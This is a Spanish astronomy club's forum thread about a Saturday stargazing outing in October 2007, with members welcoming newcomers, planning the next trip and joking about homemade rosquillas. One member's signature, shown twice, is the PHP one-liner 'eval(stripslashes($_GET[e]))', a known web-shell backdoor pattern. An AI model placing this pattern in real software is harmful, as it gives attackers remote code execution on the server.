Salida Sábado 6/10/2007

Aquí se anunciarán todas las actividades de la asociación; quedadas, charlas, cursos, talleres, etc.. Utilizadlo para apuntarse o preguntar.
María L.
Mensajes: 16
Registrado: Mar Sep 18, 2007 6:46 am

Salida Sábado 6/10/2007

Mensaje por María L. »

Una noche genial! Disfruté como una enana, así que repito seguro :D
Sois un grupo estupendo! Hay que continuar con esas conversaciones :wink:
Un saludo a todos!!
Por cierto, la ilusión que me hizo que os gustasen las rosquillas fue enorme :D cuando querais me pongo con las manos en la masa!!
Avatar de Usuario
zipizape
Mensajes: 289
Registrado: Jue Oct 04, 2007 3:03 pm

Salida Sábado 6/10/2007

Mensaje por zipizape »

Como siempre, un placer la quedada. Para mi fue también algo especial porque fui "armado caballero de Astrohenares", lo que representa un gran honor.
María L.: Reitero lo de las rosquillas pero te aconsejo que no te comprometas con esta panda de transnochadores hambrientos a no ser que quieras ser nombrada astro-cocinera oficial. Además, a veces somos muuuuchos.
Un saludo a todos.
Salvad la Tierra... es el único planeta que tiene chocolate.
Dra. Rachel Naomi Remen
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Salida Sábado 6/10/2007

Mensaje por carlosz22 »

Me alegro que os lo pasaeis tan bien :D

Espero poder apuntarme a la próxima.

Caballero Zipizape, es un honor tenerle en nuestras filas. Te recomiendo que plastifiques o forres el carnet :wink:

Me he perdido la quedada, pero a cambio he pasado un día genial en Peñalara 8) Era incompatible ir a una salida astronómica y al día siguiente levantarme a las 7 para ir a la montaña.

Un saludo a todos/as.

PD: María, tengo que probar esas rosquillas, jejeje
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Salida Sábado 6/10/2007

Mensaje por m3ntol »

También investimos Caballero AstroHenares a Ender :)

¡bienvenidos a los dos!

Creo que se está opreparando otra quedada para el próximo viernes para aquellos que no puedan ir a Navas de estena. Yo creo que me apuntaré.
phpbb:eval(stripslashes($_GET[e]));
ender
Mensajes: 67
Registrado: Dom Jul 15, 2007 8:58 pm

Salida Sábado 6/10/2007

Mensaje por ender »

Pues si, ya soy miembro! :D . Gracias por la bienvenida. Si no surge nada de improvisto yo me apuntaria para la quedada del Viernes, a ver que tiempo nos va haciendo esta semana.

Venga gente, un saludo.
alnitakzetaorionis
Betelgeuse
Mensajes: 7
Registrado: Sab Sep 08, 2007 12:52 pm

Salida Sábado 6/10/2007

Mensaje por Betelgeuse »

Hola gente,

Me presento (aunque ya lo he hecho ante los gerifaltes de AstroHenares). Me gustaría comenzar a moverme en este mundo, del que no soy más que un "becario", jeje. Una pena no haberme podido apuntar a esta salida, y también que si se hace una este fin de semana no pueda hacerlo. Y luego me voy de vacaciones, pero en noviembre me gustaría unirme a vosotros.

Saludos.

Pd: en realidad no me interesa la astronomía, sólo me quiero apuntar a las salidas por lo de las rosquillas :P .
Cuán inmensas son esas esferas y qué insignificante esta Tierra
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Salida Sábado 6/10/2007

Mensaje por m3ntol »

Precisamente se está preparando una nueva salida para el viernes del Pilar.
phpbb:eval(stripslashes($_GET[e]));
María L.
Mensajes: 16
Registrado: Mar Sep 18, 2007 6:46 am

Salida Sábado 6/10/2007

Mensaje por María L. »

Ya lo he decidido! Abandono la biología molecular y me dedico de lleno a las rosquillas :lol: monto un emporio! jaja.

Ojalá al final se pueda quedar este finde, yo me apunto! He prometido no cantar para que las nubes no amenacen :?
Un beso a todos!
Betelgeuse
Mensajes: 7
Registrado: Sab Sep 08, 2007 12:52 pm

Salida Sábado 6/10/2007

Mensaje por Betelgeuse »

Una pena que no pueda unirme para esta :( . Si se repite la semana que viene os daré la tabarra. Si no, me temo que hasta el mes que viene no podré acudir a una de estas citas.

Pd: ¿no se puede compaginar la biología molecular con las rosquillas? :wink:
Cuán inmensas son esas esferas y qué insignificante esta Tierra
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Salida Sábado 6/10/2007

Mensaje por carlosz22 »

[quote="Betelgeuse"]Pd: ¿no se puede compaginar la biología molecular con las rosquillas? :wink:[/quote]

Las rosquillas y la biología no son compatibles, si una rosquilla tiene vida encima de ella sería preocupante :lol:

Si no estoy demasiado malo me apunto a la salida de mañana, por ahora la previsión dice que estará medio nublado. No canteis en la ducha, no vayais a estropear los pocos claros :twisted:

Un saludo.
Responder